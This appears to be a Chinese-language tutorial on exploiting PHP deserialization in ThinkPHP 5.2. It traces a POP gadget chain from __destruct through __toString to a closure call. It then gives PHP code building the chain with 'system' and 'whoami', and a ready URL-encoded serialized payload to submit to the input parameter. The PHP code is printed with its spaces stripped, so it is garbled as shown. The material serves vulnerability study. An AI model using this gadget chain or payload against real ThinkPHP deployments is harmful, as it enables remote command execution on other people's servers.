thinkphp5.2反序列化

thinkphp思路：

1、确认thinkphp版本 2、查找入口点 3、输入点分析 4、敏感函数定位 5、pop链构造 6、利用与验证

以下事例主要以thinkphp5.2为例：

1、确认thinkphp版本

方法一：网页版本直接确认

方法二： 在composer.lock文件下查看

2、查找入口点（进入某个功能模块的“入口路径）

我是通过全局查找public function index发现的，入口点是/index/index

3、输入点分析

在上述图片中可判定输入点是input，并且并没有对input有限制，这一点很危险，并且对input传入的值直接进行了反序列化。

4、敏感函数定位

方法一：数据流追踪思路（看方法下面还有没有跟方法，有继续跟，没有则切换）
方法二：从 sink 往回追（找到危险函数，然后一步步往上看可控点）
重点查找__destruct() __wakeup() __toString() __call()看這些魔术方法，或者查找一些危险函数比如system() unlink() eval() file_put_contents()之类的。
我是在查找__destruct的时候，发现这个下面有removeFiles()这个方法，继续跟进

发现他调用了一个判断file_exists()的方法，通过查找官方文档得知，这个方法会调用一个echo，因此会使用到__tostring方法，因此跟进(这里将files的值赋给了filename，且files的类型是数组)

__toString()又調用了toJson()继续跟进
它里面调用了toArray()跟进

跟进toArray()则发现getAttr()继续

跟进发现getData()和getValue()（$name是getAttr($key)中key的值，又在getData中将name的值给$value）

继续跟进getData()发现getRealFieldName（）和array_key_exists()，其中array_key_exists()是数组中是否中存在指定键名（getData()中输出了value的值）

跟进发现里面是判断严格模式开关是否开启，开启则true，因此这里是原名输出

回到getAttr()跟进getValue()（其中name value在getData()中被赋值）跟进

跟进到getValue()发现触发点$value = $closure($value, $this->data);并且根据上述分析，发现$value、this->$data、$closure都是可控的，因此可以构造类似system(whoami,[])之类的，即使第二个参数为空也可以执行
$value的值是由getData()最终返回的值
$closure的是值是由withAttr数组中取出来的
this->$data的值是由模型属性控制的

5、pop链构造

__destruct---->removeFiles()—>file_exists()—>__toString()—>toJson()—>toArray()—>getAttr()—>getValue
其次找出里面所使用过的变量之后开始写payload：

<?namespacethink\process\pipes{classWindows{private$files=[];function__construct($files){$this->files=$files;}}}namespacethink\model\concern{traitConversion{protected$visible;}traitRelationShip{private$relation;}traitAttribute{private$withAttr;private$data;}}namespacethink{abstractclassModel{usemodel\concern\RelationShip;usemodel\concern\Conversion;usemodel\concern\Attribute;function__construct($closure){$this->data=$closure;$this->relation=[];$this->visible=[];$this->withAttr=array("paper"=>'system');}}}namespacethink\model{classPivotextends\think\Model{function__construct($closure){parent::__construct($closure);}}}namespace{$pivot=newthink\model\Pivot(['paper'=>'whoami']);$windows=newthink\process\pipes\Windows([$pivot]);echourlencode(serialize($windows));}?>

6、利用与验证

urlencode之后的序列化编码：
O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A21%3A%22%00think%5CModel%00relation%22%3Ba%3A0%3A%7B%7Ds%3A10%3A%22%00%2A%00visible%22%3Ba%3A0%3A%7B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A5%3A%22paper%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A5%3A%22paper%22%3Bs%3A6%3A%22whoami%22%3B%7D%7D%7D%7D
随后在给input传入